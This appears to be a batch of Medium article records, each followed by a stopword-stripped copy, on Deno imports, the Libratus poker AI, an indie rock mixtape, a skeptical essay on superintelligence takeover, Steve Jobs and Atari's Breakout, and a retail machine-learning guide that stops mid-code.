Title Using node module DenoContent Photo frank mckenna Unsplash Using node module Deno bad practice sometimes alternative Last time introduced Deno discussed compare node like node Deno server side codeexecution environment based web technology Node us JavaScript commonjs module npmyarn it’s package manager Deno us Typescript JavaScript modern javascript import statement need package manager import module usual deno reference URL import serve httpsdenolandstdhttpserverts find many module may need Deno standard library Deno third party module list don’t everything Sometimes need use module maintainer made available npm ecosystem method convenient least 1 module already us ES module importexport syntax library use deno don’t come recommended Deno package come URL provided use modern import syntax Using unpkg great way access file directly inside npm repo import throttle httpsunpkgcomlodash41719throttlejs 2 module doesn’t use import source code module compiled wrong format though npm may still luck take look source code Many popular library moved away using commonjs source code standard compliant e module import syntax package separate src dist directory esmodule style code src isn’t included package available npm case import source directly import throttle httpsrawgithubusercontentcomlodashlodashmasterthrottlejs got URL clicking “raw” button github get raw JS file It’s probably neater use github cdn see file available github page work NB library use esmodules webpack module loader let import node module like Bad import someFunction modulename import someOtherFunction modulenamefilejs standard import need start URL work Good import someOtherFunction folderfilejs situation try next method 3 Importing commonjs module Fortunately service called JSPM resolve 3rd party module compile commonjs module work esmodule import tool using node module browser without build step use JSPM logo recent project wanted push notification involves generating credential VAPID deno crypto library encryption full procedure difficult I’d rather use popular webpush library import using JSPM CDN using URL like import webPush httpsdevjspmiowebpush use like module deno almost worked 100 bit relied specific node behavior making network request failed situation work around use standardised fetch API deno us Getting Typescript type working One nice feature typescipt deno us provides really good autocomplete module deno extension editor even autocomplete third part module know type definition isn’t essential getting code work provide huge benefit helping maintain code importing another module called fastxmlparser looking source code noticed type definition file file end dts file describe various interface even work even JavaScript j file sometimes also find type definition file typessomemodule repo Using file typescript auto complete thing imported JavaScript file Even file imported using JSPM Import fastxmlparser library import fastXMLParser httpsdevjspmiofastxmlparser Import type definition file source code fastxmlparser import FastXMLParser httpsrawgithubusercontentcomNaturalIntelligencefastxmlparsermastersrcparserdts Use parser type const parser fastXMLParser typeof FastXMLParser import type definition definition file FastXMLParser note uppercase F doesn’t contain working code object type code want import import code JSPM fastXMLParser lowercase f working code type Next combine together make parser fastXMLParser type FastXMLParser Thank reading hope give deno go ability use module made web even made nodenpm really give 
new server side library ecosystem good foundation get started 🦕Tags Deno Nodejs JavaScript Samsung Internet Web Development
3,883
Poker? Done that. Now the next challenge…
IMAGE: Yuriy Davats — 123RF Poker, as has previously happened to chess and Go, has joined the games that a set of algorithms is already capable of playing better than the human champions can manage. On January 31, after twenty days of Heads Up, No Limit Texas Hold ’em, four people considered among the best professional poker players in the world were defeated by an artificial intelligence machine, Libratus, the product of the work of researchers at Carnegie Mellon directed by Tuomas Sandholm. Twenty days watching computer screens, playing about 120,000 hands, and meeting at night in their hotel rooms to coordinate joint strategies were not enough to beat an algorithm that quickly understood the strategies employed by humans and soon overcame them. The game was clearly dominated by Libratus from the first moment: the human players were not even close to winning at any time. The aim of keeping the championship going to the end was to achieve a victory that could be considered statistically significant, that is to say, a margin of victory significant at the 99.7% level, one that could hardly be the product of chance. What really matters here is that the algorithms used were not specific to the game of poker, nor did they try to exploit the mistakes of Libratus’s opponents. They simply took the rules of the game as their inputs and focused on improving their own strategy by taking into account the cards dealt, those on the table and the bets placed by each player. Texas Hold ’em, with its unlimited betting and the uncertainty of two hidden cards on whose potential values players speculate, offers a very good example of imperfect information play, and serves as an appetizer for other non-gambling activities such as negotiation, cybersecurity, finance, or even research on antiviral treatments (taking the mutations of the virus, whose genetic sequence is known, as uncertain variables that allow it to survive certain drugs). There are plenty of areas similar to poker: we’re no longer speaking about a machine that can learn the rules of a game and apply computational brute force to calculate. What Libratus’s victory means in simple terms is that artificial intelligence is better at making strategic decisions based on uncertain information than humans are. If you thought that a machine was only capable of repeating what it had been programmed to do, think again: a machine has been able to analyze 120,000 poker moves and, given the cards it was dealt, the cards already on the table and the bets of each of its opponents, consistently won on a statistically significant number of occasions, enough to rule out luck or chance. So next time you sit down to play a hand of poker, remember that no matter how well you do, there is a machine out there that will always beat you. And from now on, that won’t just apply to card games…
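To make the "statistically significant" claim concrete, here is a rough back-of-the-envelope check. This is illustrative only: it is not how the Carnegie Mellon team actually scored the match, the per-hand winnings below are simulated, and hands are treated as independent, which real poker hands are not quite.

```python
import math
import random

def significance_of_margin(per_hand_winnings):
    """Two-sided z-test that the mean winnings per hand differ from zero.

    Treats hands as independent and identically distributed, which is a
    simplification of how the real match was evaluated.
    """
    n = len(per_hand_winnings)
    mean = sum(per_hand_winnings) / n
    var = sum((x - mean) ** 2 for x in per_hand_winnings) / (n - 1)
    z = mean / math.sqrt(var / n)
    # Normal-approximation p-value via the complementary error function.
    p_value = math.erfc(abs(z) / math.sqrt(2))
    return z, p_value

# Hypothetical data: 120,000 hands with a small average edge for the AI.
random.seed(0)
hands = [random.gauss(mu=0.15, sigma=10.0) for _ in range(120_000)]
z, p = significance_of_margin(hands)
print(f"z = {z:.2f}, p = {p:.3g}")  # p below 0.003 would clear a 99.7% bar
```

The point of the sketch is simply that, over 120,000 hands, even a small per-hand edge becomes extremely unlikely to be luck.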
https://medium.com/enrique-dans/poker-done-that-now-the-next-challenge-330b67b11a28
['Enrique Dans']
2017-02-02 22:29:22.028000+00:00
['AI', 'Poker', 'Algorithms', 'Artificial Intelligence', 'Machine Learning']
Title Poker Done next challenge…Content IMAGE Yuriy Davats — 123RF Poker previously happened chess Go joined game set algorithm already capable playing better human champion manage January 31 twenty day Heads Limit Texas Hold ’em four people considered among best professional poker player world defeated artificial intelligence machine Libratus product work researcher Carnegie Mellon directed Tuomas Sandholm Twenty day watching computer screen playing 120000 hand meeting night hotel room coordinate joint strategy enough beat algorithm quickly understood strategy employed human soon overcame game clearly dominated Libratus first moment human player even close winning time aim keeping championship going end achieve victory could considered statistically significant say winning 997 time hardly product chance really matter algorithm used specific game poker try exploit mistake Libratus’s opponent simply took rule game input focused improving strategy taking account card dealt table bet placed player Texas Hold ’em unlimited betting uncertainty two hidden card whose potential value player speculate offer good example imperfect information play serf appetizer nongambling activity negotiation cybersecurity finance even research antiviral treatment taking mutation virus whose genetic sequence known uncertain variable allow survive certain drug plenty area similar poker we’re longer speaking machine learn rule game apply computational brute force calculate Libratus’s victory mean simple term artificial intelligence better making strategic decision based uncertain information human thought machine capable repeating programmed think machine able analyze 120000 poker move given card dealt card already table bet opponent consistently statistically significant number occasion enough rule luck chance next time sit play hand poker remember matter well machine always beat won’t apply card games…Tags AI Poker Algorithms Artificial Intelligence Machine Learning
3,884
The Mixtape for Indie Rock Lovers Vol. 1
The Mixtape for Indie Rock Lovers Vol. 1 Rewind. Record. Repeat. As a late 80’s kid, the joy of discovering new music through hand-crafted compilations was easily shared through mixtapes. And even though I missed a portion of that era, I still remember running to my cassette player to hit record, only to find out later that the first 30 seconds were missing. When cassette tapes became a thing of the past, CD burners made their way to the music scene and, of course, I was pretty stoked to make my first mix. There was an art to crafting our own playlists that we could hand out to our friends, and accessing music through Spotify just doesn’t have the same je ne sais quoi. Before we get started, I just want to let you know that I spiralled down a black hole trying to define the term indie rock — which led me to write a lengthy article explaining the history behind it. Despite the slight distinctions in origins, calling this an “alternative” playlist could have been a better option. But in retrospect, creating my own sub-genres was a more exciting idea.
https://medium.com/narrative/the-mixtape-for-indie-rock-lovers-vol-1-e89a6cfddbbc
['Katy Velvet']
2019-05-04 06:40:20.985000+00:00
['Inspiration', 'Culture', 'Ideas', 'Creativity', 'Music']
Title Mixtape Indie Rock Lovers Vol 1Content Mixtape Indie Rock Lovers Vol 1 Rewind Record Repeat late 80’s kid joy discovering new music handcrafted compilation easily shared mixtapes even though missed portion era still remember running cassette player hit record find later first 30 second missing cassette tape became thing past — CD burner made way music scene course pretty stoked making first mix art crafting playlist could hand friend accessing music Spotify doesn’t je ne sais quoi get started want let know spiralled black hole trying define term indie rock — lead creating lengthy article explaining history behind Despite slight distinction origin calling “alternative” playlist could better option retrospect creating subgenres exciting ideaTags Inspiration Culture Ideas Creativity Music
3,885
Superintelligence Vs. You
Supposedly atheist intellectuals are now spending a lot of time arguing over the consequences of creating “God.” Often they refer to this supreme being as a “superintelligence,” an A.I. that, in their thought experiments, possesses magical traits far beyond just enhanced intelligence. Any belief system needs a positive and negative aspect, and for this new religion-replacement, the “hell” scenario is that this superintelligence we cannot control might decide to conquer and destroy the world. Like their antecedents—Hegel, Marx, J.S. Mill, Fukuyama, and many others—these religion-replacement proposers view history as a progression toward some endpoint (often called a “singularity”). This particular eschaton involves the creation of a superintelligence that either uplifts us or condemns us. The religious impulse of humans—the need to attribute purpose to the universe and history—is irrepressible even among devoted atheists. And, unfortunately, this worldview has been taken seriously by normally serious thinkers. I and others have argued that rather than new technologies leading to some sort of end-of-history superintelligence, it’s much more likely that a “tangled bank” of all sorts of different machine intelligences will emerge: some small primitive A.I.s that mainly filter spam from email, some that drive, some that land planes, some that do taxes, etc. Some of these will be much more like individual cognitive modules, others more complex, but they will exist, like separate species, adapted to a particular niche. As with biological life, they will bloom across the planet in endless forms, most beautiful. This view is a lot closer to what’s actually happening in machine learning on a day-to-day basis. Evolution is an endless game that’s fundamentally nonprogressive. The logic behind this tangled bank is based on the fundamental limits of how you can build an intelligence as an integrated whole. Just like evolution, no intelligence can be good at solving all classes of problems. Adaptation and specialization are necessary. It’s this fact that ensures evolution is an endless game and makes it fundamentally nonprogressive. Organisms adapt to an environment, but that environment changes, maybe even due to that organism’s adaptation, and so on, for however long there is life. Put another way: Being good at some things makes it harder to do others, and no entity is good at everything. In a nonprogressive view, intelligence is, from a global perspective, very similar to fitness. Becoming more intelligent at X often makes you worse at Y, and so on. This ensures that intelligence, just like life, has no fundamental endpoint. Human minds struggle with this view because without an endpoint there doesn’t seem to be much of a point either. Despite the probable incoherence of a true superintelligence (all knowing, all seeing, etc.), some argue that, because we don’t fully know the formal constraints on building intelligences, it may be possible to build something that’s superintelligent in comparison to us and that operates over a similar class of problems. This more nuanced view argues that it might be possible to build something more intelligent than a human over precisely the kinds of domains humans are good at. This is kind of like an organism outcompeting another organism for the same niche. Certainly this isn’t in the immediate future. 
But let’s assume, in order to show that concerns about the creation of superintelligence as a world-ending eschaton are overblown, that it is indeed possible to build something 1,000x smarter than a human across every problem-solving domain we engage in. Even if that superintelligence were created tomorrow, I wouldn’t be worried. Such worries are based on a kind of Doctor Who-esque being. A being that, in any circumstance, can find some advantage via pure intelligence that enables victory to be snatched from the jaws of defeat. A being that, even if put in a box buried underground, would, just like Doctor Who, always be able to use its intelligence to both get out of the box and go on to conquer the entire world. Let’s put aside the God-like magical powers often granted superintelligences—like the ability to instantaneously simulate others’ consciousnesses just by talking to them or the ability to cure cancer without doing any experiments (you cannot solve X just by being smart if you don’t have sufficient data about X; ontology simply doesn’t work that way)—and just assume it’s merely a superintelligent agent lacking magic. The important thing to keep in mind is that Doctor Who is able to continuously use intelligence to solve situations because the show writers create it that way. The real world doesn’t constantly have easy shortcuts available; in the real world of chaotic dynamics and P!=NP and limited data, there aren’t orders-of-magnitude more efficient solutions to every problem in the human domain of problems. And it’s not that we fail to identify these solutions because we lack the intelligence. It’s because they don’t exist. An example of this is how often superintelligence can be beaten by a normal human at all sorts of tasks, given either the role of luck or small asymmetries between the human and the A.I. For example, imagine you are playing chess against a superintelligence of the 1,000x-smarter-than-humans-across-all-human-problem-solving-domains variety. If you’re one of the best chess-players in the world, you could at most hope for a tie, although you may never get one. Now let’s take pieces away from the superintelligence, giving it just pawns and its king. Even if you are, like me, not well-practiced at chess, you could easily defeat it. This is simply a no-win scenario for the superintelligence, as you crush it on the board, mercilessly trading piece for piece, backing it into a corner, finally toppling its king. That there are natural upper bounds on performance from being intelligent isn’t some unique property of chess and its variants. In fact, as strategy games get more complex, intelligence often matters less. Because the game gets chaotic, predictions are inherently less precise due to amplifying noise, available data for those predictions becomes more limited, and brute numbers, positions, resources, etc., begin to matter more. Let’s bump the complexity of the game you’re playing against the superintelligence up to the computer strategy game Starcraft. Again, assuming both players start perfectly equal, let’s grant the superintelligence an easy win. But, in this case, it would take only a minor change in the initial conditions to make winning impossible for the superintelligence. Tweaking, say, starting resources would put the superintelligence into all sorts of no-win scenarios against even a mediocre player. Even just delaying the superintelligence from starting the game by 30 seconds would probably be enough for great human players to consistently win. 
You can give the superintelligence whatever properties you want—maybe it thinks 1,000x faster than a human. But its game doesn’t run 1,000x faster, and by starting 30 seconds earlier, the human smokes it. The point is that our judgments on how effective intelligence alone is for succeeding at a given task are based on situations when all other variables are fixed. Once you start manipulating those variables, instead of controlling for them, you see that intelligence is only one of many things that affect the outcome of even the most strategic games—and often not a very important one. We can think of a kind of ultimate strategy game called Conquer the World. You’re born into this world with whatever resources you start with, and you, a lone agent, must conquer the entire earth and all its nations, without dying. I hate to break it to you: There’s no way to consistently win this game. It’s not just because it’s a hard game. It’s because there is no way to consistently win this game, no matter your intelligence or strategy—it just doesn’t exist. The real world doesn’t have polarity reversals and there are many tasks with no shortcuts. The great whirlwind of limbs, births, deaths, careers, lovers, companies, children, consumption, nations, armies—that is, the great globe-spanning multitudinous mass that is humanity—has so many resources and numbers and momentum it is absurd to think that any lone entity could, by itself, ever win a war against us, no matter how intelligent that entity was. It’s like a Starcraft game where the superintelligence starts with one drone and we start with literally the entire map covered by our bases. It doesn’t matter how that drone behaves, it’s just a no-win scenario. Barring magical abilities, a single superintelligence, with everything beyond its senses hidden in the fog of war, with limited data, dealing with the exigencies and chaos and limitations that define the physical world, is in a no-win scenario against humanity. And a superintelligence, if it’s at all intelligent, would know this. Of course, no thought experiment or argument is going to convince someone out of a progressive account of history, particularly if the progressive account operates to provide morality, structure, and meaning to what would otherwise be a cold and empty universe. Eventually the workers must rise up, or equality for all must be achieved, or the chosen nation-state must bestride the world, or we must all be uplifted into a digital heaven or thrown into oblivion. To think otherwise is almost impossible. Human minds need a superframe that contains all others, that endows them with meaning, and it’s incredibly difficult to operate without one. This “singularity” is as good as any other, I suppose. Humans just don’t do well with nonprogressive processes. The reason it took so long to come up with the theory of evolution by natural selection, despite its relatively simple logic and armchair-derivability, is its nonprogressive nature. These are things without linear frames, without beginnings or ends or reasons why. When I was studying evolutionary theory back in college, I remember at one moment feeling a dark logic click into place: Life was inevitable, design inevitable, yet it needed no watchmaker and had no point, and that this pointlessness was the reason why I was, why everyone was. 
But such a thought is slippery, impossible to hold onto for a human, to really keep believing in the trenches of the everyday. And so, when serious thinkers fall for silly thoughts about history coming to an end, we shouldn’t judge. Each of us, after all, engages in such silliness every morning when we get out of bed.
https://medium.com/s/story/superintelligence-vs-you-1e4a77177936
['Erik Hoel']
2019-02-05 22:18:39.533000+00:00
['Machine Learning', 'Technology', 'Artificial Intelligence', 'Robots', 'Future']
Title Superintelligence Vs YouContent Supposedly atheist intellectual spending lot time arguing consequence creating “God” Often refer supreme “superintelligence” AI thought experiment posse magical trait far beyond enhanced intelligence belief system need positive negative aspect new religionreplacement “hell” scenario superintelligence cannot control might decide conquer destroy world Like antecedents—Hegel Marx JS Mill Fukayama many others—these religionreplacement proposer view history progression toward endpoint often called “singularity” particular eschaton involves creation superintelligence either uplift u condemns u religious impulse humans—the need attribute purpose universe history—is irrepressible even among devoted atheist unfortunately worldview taken seriously normally serious thinker others argued rather new technology leading sort endofhistory superintelligence it’s much likely “tangled bank” sort different machine intelligence emerge small primitive AIs mainly filter spam email drive land plane tax etc much like individual cognitive module others complex exist like separate specie adapted particular niche biological life bloom across planet endless form beautiful view lot closer what’s actually happening machine learning daytoday basis Evolution endless game that’s fundamentally nonprogressive logic behind tangled bank based fundamental limit build intelligence integrated whole like evolution intelligence good solving class problem Adaptation specialization necessary It’s fact ensures evolution endless game make fundamentally nonprogressive Organisms adapt environment environment change maybe even due organism’s adaptation however long life Put another way good thing make harder others entity good everything nonprogressive view intelligence global perspective similar fitness Becoming intelligent X often make worse ensures intelligence like life fundamental endpoint Human mind struggle view without endpoint doesn’t seem much point either Despite probable incoherence true superintelligence knowing seeing etc argue don’t fully know formal constraint building intelligence may possible build something that’s superintelligent comparison u operates similar class problem nuanced view argues might possible build something intelligent human precisely kind domain human good kind like organism outcompeting another organism niche Certainly isn’t immediate future let’s assume order show concern creation superintelligence worldending eschaton overblown indeed possible build something 1000x smarter human across every problemsolving domain engage Even superintelligence created tomorrow wouldn’t worried worry based kind Doctor Whoesque circumstance find advantage via pure intelligence enables victory snatched jaw defeat even put box buried underground would like Doctor always able use intelligence get box go conquer entire world Let’s put aside Godlike magical power often granted superintelligences—like ability instantaneously simulate others’ consciousness talking ability cure cancer without experiment cannot solve X smart don’t sufficient data X ontology simply doesn’t work way—and assume it’s merely superintelligent agent lacking magic important thing keep mind Doctor able continuously use intelligence solve situation show writer create way real world doesn’t constantly easy shortcut available real world chaotic dynamic PNP limited data aren’t ordersofmagnitude efficient solution every problem human domain problem it’s fail identify solution lack intelligence It’s don’t exist example 
often superintelligence beaten normal human sort task given either role luck small asymmetry human AI example imagine playing chess superintelligence 1000xsmarterthanhumansacrossallhumanproblemsolvingdomains variety you’re one best chessplayers world could hope tie although may never get one let’s take piece away superintelligence giving pawn king Even like wellpracticed chess could easily defeat simply nowin scenario superintelligence crush board mercilessly trading piece piece backing corner finally toppling king natural upper bound performance intelligent isn’t unique property chess variant fact strategy game get complex intelligence often matter le game get chaotic prediction inherently le precise due amplifying noise available data prediction becomes limited brute number position resource etc begin matter Let’s bump complexity game you’re playing superintelligence computer strategy game Starcraft assuming player start perfectly equal let’s grant superintelligence easy win case would take minor change initial condition make winning impossible superintelligence Tweaking say starting resource would put superintelligence sort nowin scenario even mediocre player Even delaying superintelligence starting game 30 second would probably enough great human player consistently win give superintelligence whatever property want—maybe think 1000x faster human game doesn’t run 1000x faster starting 30 second earlier human smoke Intelligence one many thing affect outcome even strategic game — often important one point judgment effective intelligence alone succeeding given task based situation variable fixed start manipulating variable instead controlling see intelligence one many thing affect outcome even strategic games—and often important one think kind ultimate strategy game called Conquer World You’re born world whatever resource start lone agent must conquer entire earth nation without dying hate break There’s way consistently win game It’s it’s hard game It’s way consistently win game matter intelligence strategy—it doesn’t exist real world doesn’t polarity reversal many task shortcut great whirlwind limb birth death career lover company child consumption nation armies—that great globespanning multitudinous mass humanity—has many resource number momentum absurd think lone entity could ever win war u matter intelligent entity It’s like Starcraft game superintelligence start one drone start literally entire map covered base doesn’t matter drone behaves it’s nowin scenario Barring magical ability single superintelligence everything beyond sens hidden fog war limited data dealing exigency chaos limitation define physical world nowin scenario humanity superintelligence it’s intelligent would know course thought experiment argument going convince someone progressive account history particularly progressive account operates provide morality structure meaning would otherwise cold empty universe Eventually worker must rise equality must achieved chosen nationstate must bestride world must uplifted digital heaven thrown oblivion think otherwise almost impossible Human mind need superframe contains others endows meaning it’s incredibly difficult operate without one “singularity” good suppose Humans don’t well nonprogressive process reason took long come theory evolution natural selection despite relatively simple logic armchairderivability nonprogressive nature thing without linear frame without beginning end reason studying evolutionary theory back college remember one moment feeling dark logic click 
place Life inevitable design inevitable yet needed watchmaker point pointlessness reason everyone thought slippery impossible hold onto human really keep believing trench everyday serious thinker fall silly thought history coming end shouldn’t judge u engages silliness every morning get bedTags Machine Learning Technology Artificial Intelligence Robots Future
3,886
Steve Jobs’ Dark Past
Steve Jobs’ Dark Past The time Steve Jobs cheated his way to success Steve Wozniak, Atari and Steve Jobs Image source: (Photo by Reuters) Steve Wozniak on Breakout, Atari and Steve Jobs I believe that most people have a dark past, a past that they wish would never come to light, but sooner or later you have to take that pressure off your chest and come clean. This is what Steve Jobs did about the way he tricked his best friend into working all night long for several days and then cheated him out of his paycheck. This proved to be only the first offense in a long litany of his penchant for pettiness and pointless cruelty. The friend I am talking about is Steve Wozniak. He and Jobs were working at Atari, one of the first video game companies, which revolutionized the video game market. Atari was still run at the time by its founder, Nolan Bushnell. The first game that came out was “Pong,” a classic which many people remember. Due to its high success, Bushnell decided in 1975 to make a single-player sequel called “Breakout.” Appearances can be deceiving For this project, Bushnell was thinking of putting Steve Jobs in charge. Jobs was considered (at the time) a low-level Atari technician with huge potential. As this game was expected to be much better than its predecessor, Jobs recruited Steve Wozniak, who was known as the better engineer. Jobs and Wozniak had been friends for quite some time at that point. They were both working towards the Apple 1, which would go on to become the most iconic computer in the world for four long years, so they got to spend a lot of time together. The way Atari worked was by offering a monetary bonus for every chip fewer than fifty that was used when building a game. Wozniak was ecstatic when Jobs asked him to help with this big project. This is when Jobs started to lie to Wozniak in order to use him for his expertise. He told Wozniak that the deadline was four days and that he had to use as few chips as possible. The truth is that Jobs was given a whole month for this project, not four days. Jobs never told Wozniak about the bonus for using fewer chips, and the four-day deadline was self-imposed by Jobs, as he needed to get back to his commune farm to help bring in the apple harvest. It is worth mentioning (for those who are not aware) that Steve Jobs came from a very poor background. Wozniak was also working for Hewlett-Packard at the time, so he had to balance his main job with this project. He would go to his job in the daytime and spend most of the night working on “Breakout”. The only thing Jobs did was implement the required chips, making sure that there were fewer than fifty. Their herculean efforts succeeded, as they finished the game in four days using only forty-five chips. When payday came, Steve Jobs gave Wozniak only half the pay; he kept the rest, as well as the bonus, for himself. Wozniak only found out about this ten years later. He is quoted in the Isaacson biography Steve Jobs: “When he talks about it now, there are long pauses, and he admits it causes him pain.” “I wish he had just been honest. If he had told me he needed the money, he should have known I would have just given it to him. He was a friend. You help your friends.” “Ethics always mattered to me, and I still don’t understand why he would have gotten paid one thing and told me he’d gotten paid another. But, you know, people are different.” Quotes are taken from Steve Jobs: The Exclusive Biography by Walter Isaacson. Wozniak, to his credit, did not hold this against Jobs in later years. The reason why Jobs did this is unknown to the public: many think it was his need for money to keep working on the Apple 1 computer, whilst others say that those are his true colors. I am not here to judge Steve Jobs, as I believe we all, at some point in time, have chosen the wrong path, especially in our younger years.
https://medium.com/history-of-yesterday/steve-jobss-dark-past-55a98044f3b4
['Andrei Tapalaga']
2020-11-06 14:21:13.517000+00:00
['History', 'Marketing', 'Business', 'Life Lessons', 'Entrepreneurship']
Title Steve Jobs’ Dark PastContent Steve Jobs’ Dark Past time Steve Job’s cheated way success Steve Wozniak Atari Steve Jobs Image source Photo Reuters Steve Wozniak Breakout Atari Steve Jobs believe people dark past past wish won’t come light sooner later take pressure chest come clean Steve Jobs fact tricked best friend working night long several day cheating paycheck proved first offense long litany penchant pettiness pointless cruelty friend talking Steve Wozniak Jobs working Atari one first video game console revolutionized video game market owner Atari time actual founder name Nolan Bushnell first game came “Pong” classic many people remember Due high success Bushnell thought making sequel would singleplayer call “Breakout” 1975 Appearances deceiving project Bushnell thinking tasking Steve Jobs charge take care project Jobs considered time lowlevel Atari technician huge potential game expected much better predecessor Jobs recruited Steve Wozniak known market better engineer Jobs Wozniak friend quite time point working towards Apple 1 would follow become iconic computer around world four long year got spend lot time together way Atari worked offering monetary bonus every chip fewer fifty used building game Wozniak ecstatic Jobs asked help big project Jobs started lie Wozniak order use expertise told Wozniak deadline four day use chip possible truth Jobs given whole month project four day Jobs never told Wozniak bonus using fewer chip fourday deadline selfimposed Jobs needed get back commune farm help bring apple harvest imperative mention aware Steve Jobs came poor background Wozniak working HewlettPackard time well balance main job well project would end going job day time spending night working “Breakout” thing Steve implementing required chip making sure le fifty chip herculean effort succeeded finished game four day using fortyfive chip payday came Steve Jobs gave Wozniak half pay kept rest pay well bonus Wozniak found ten year later quoted Isaacson biography Steve Jobs “When talk long pause admits cause pain” “I wish honest told needed money known would given friend help friends” “Ethics always mattered still don’t understand would gotten paid one thing told he’d gotten paid another know people different” Quotes taken Steve Jobs Exclusive Biography Walter Isaacson Wozniak credit hold Jobs later year reason Jobs unknown public many think need money keep working Apple 1 computer whilst others say true color judge Steve Jobs believe point time chose wrong path especially younger yearsTags History Marketing Business Life Lessons Entrepreneurship
3,887
Complete guide to machine learning and deep learning in retail
Complete guide to machine learning and deep learning in retail The stores aren’t dead yet Stores are changing. We see it happening before our eyes, even if we don’t always realize it. Little by little, they are becoming just one extra step in an increasingly complex customer journey. Thanks to digitalisation and retail automation, the store is no longer an end in itself, but a means of serving the needs of the brand at large. The quality of the experience, a feeling of belonging and recognition, the comfort of the purchase… all these parameters now matter as much as sales per square meter, and must therefore submit themselves to the optimizations prescribed by Data Science and its “intelligent algorithms” (aka artificial intelligence in the form of machine learning and deep learning). The use of artificial intelligence is, above all, a competitive necessity. Indeed, e-commerce players did not wait on anyone: note, for example, the adaptation of online search results to the end customer, or the recommendations made based on a digital profile. These two aspects are impossible for brick and mortar (for now). However, physical commerce has its own strengths. Olfactory, visual, auditory and other data can be used to give the consumer a feeling of having experienced something unique and made specifically for them. In addition to customer relationship improvements, artificial intelligence also makes it possible to tackle problems that have long represented a burden for retailers: better inventory management, optimization of store space, optimization of employee time… We present below a complete look at deep learning and machine learning use cases implemented to create the store of the future, supported by real-life examples.
1. Adapting the store and its inventory to better serve customers
It’s a known fact that e-commerce actors can optimize their websites in real time using dynamic statistics. This allows them to define the most effective strategies according to the resources available and predefined customer segmentation. Like any physical space, the store does not have this luxury. However, this does not prevent the periodic optimization of physical spaces, thanks to insights gleaned from intelligent algorithms. Back in the day (less than 20 years ago), we’d hire students to follow and count customers in specific areas of the store. Thankfully, these times are over. Heat-maps, average route diagrams, time spent on screens, various ratios in relation to total attendance, correlations… the cameras in store and computer vision algorithms now provide actionable tools based on images. Today, heat-mapping and activity recognition solutions help not only to position promotions, but also to create entire marketing strategies, and to measure the performance of each department, as well as that of product placements. Solutions offered by the likes of RetailFlux can analyze store videos to give retailers data on the number of people in their store, the path they take once inside and where they linger. This helps marketers identify popular locations, allowing them to change the layout of furnishings, displays, advertising or staff to better serve their customers and increase revenue.
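As a rough illustration of what such heat-mapping tools do under the hood, the sketch below (plain NumPy, with made-up detection data) accumulates customer positions, as a person detector running on camera footage might produce them, into a grid of visit counts. Real products obviously add tracking, camera calibration and dwell-time logic on top; the function and variable names here are purely illustrative.

```python
import numpy as np

def build_heatmap(detections, floor_width_m, floor_depth_m, cell_size_m=0.5):
    """Accumulate (x, y) customer detections into a grid of visit counts.

    detections: iterable of (x, y) positions in metres on the store floor,
    e.g. one entry per detected person per sampled video frame.
    Returns a 2D array where each cell counts how often someone stood there.
    """
    nx = int(np.ceil(floor_width_m / cell_size_m))
    ny = int(np.ceil(floor_depth_m / cell_size_m))
    grid = np.zeros((ny, nx))
    for x, y in detections:
        i = min(int(y / cell_size_m), ny - 1)
        j = min(int(x / cell_size_m), nx - 1)
        grid[i, j] += 1
    # Normalise so the hottest cell is 1.0, which makes stores comparable.
    return grid / grid.max() if grid.max() > 0 else grid

# Illustrative use: random foot traffic in a 20 m x 30 m store.
rng = np.random.default_rng(42)
fake_detections = rng.uniform([0, 0], [20, 30], size=(10_000, 2))
heatmap = build_heatmap(fake_detections, floor_width_m=20, floor_depth_m=30)
print(heatmap.shape, heatmap.max())
```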
As technologies evolve, we are also starting to hear about “demographic recognition”: these tools, created by start-ups such as DeepVision AI, MyStore-e, RetailDeep and RetailNext, allow us to estimate the age and gender of people passing in front of a camera, thus giving stores access to a whole new granularity of analysis. This aspect is paramount to the rationalisation now expected of marketers and category managers. Although these cameras are often hung from the ceiling, this is not always the case: Walgreens (in partnership with Cooler Screens), for example, recently integrated cameras, sensors and digital screens in the doors of its stores’ coolers to create a network of “smart” displays that brands can use to target ads to specific types of customers. The doors act as a digital merchandising platform that depicts food and beverages in their best light, but also as an in-store billboard that can show ads to consumers who are approaching, based on variables such as approximate age, gender and current weather. Cameras and sensors inside the connected coolers can also determine which items buyers have picked up or viewed, giving advertisers insight into how their promotions work on the screen, and quickly notifying a retailer if a product is no longer in stock. The key question thus shifts from “where” and “how many” to “who”, “when”, “how often”, “how long” and “for how many cookies?”.
2. Forecasting to increase profits
These data, mixed with those from check-outs and loyalty programs, are key to forecasting demand and creating store clusters, which in turn improves retailers’ supply chains. By better predicting what products will do well in a certain area, machine learning algorithms from startups such as Symphony RetailAI can reduce dead stock, help optimise pricing (and profits), and increase customer loyalty (people obviously tend to enjoy finding the right product mix in their nearest store). Indeed, unsold stock might be one of the retail industry’s biggest handicaps: unused inventory costs U.S. retailers about $50 billion a year. Reducing this number is key to the industry’s long-term survival: every dollar spent on what becomes dead inventory is valuable money that could have been put towards training talent, better R&D, or, most obviously, brand new smart algorithms. Forecasting also helps retailers optimise their promotions: the less dead stock there is in the warehouse, the more strategic promotions can be, instead of being merely reactionary. Many pricing aficionados will particularly appreciate this aspect, as it will make their job a lot easier, and a lot less thankless.
3. Personalisation to promote an in-store experience
In the same way that a website can adapt in real time to end users, an increased granularity of computer vision is also possible in stores, allowing it to target individuals. However, these algorithms are based on more elements than the ones presented above, and are thus more complex and less reliable. To work at a personal level, the algorithms need a mix of demographic recognition, loyalty code identification, and augmented reality, often integrated into smart objects such as mirrors. Although they cannot (yet) be implemented on a large scale, these solutions exemplify a profound change in the way stores sell. We are moving from the sale of products to the sale of experiences, where the physical offer becomes a by-product. This is the concept of shoppertainment.
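Before moving on to personalisation in practice, it is worth making the forecasting use case from section 2 concrete. The sketch below is an assumption-laden illustration, not a description of what vendors such as Symphony RetailAI actually ship: the features, the synthetic sales history and the choice of scikit-learn's gradient boosting are all stand-ins for what a real demand-forecasting pipeline would use.

```python
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_absolute_error

# Hypothetical history: one row per (store, product, week) with simple features.
rng = np.random.default_rng(0)
n = 5_000
week_of_year = rng.integers(1, 53, n)
on_promo = rng.integers(0, 2, n)
price = rng.uniform(1.0, 10.0, n)
last_week_sales = rng.poisson(20, n)
# Synthetic demand: seasonality + promotion lift + price sensitivity + noise.
units_sold = (
    20
    + 5 * np.sin(2 * np.pi * week_of_year / 52)
    + 8 * on_promo
    - 1.5 * price
    + 0.3 * last_week_sales
    + rng.normal(0, 3, n)
)

X = np.column_stack([week_of_year, on_promo, price, last_week_sales])
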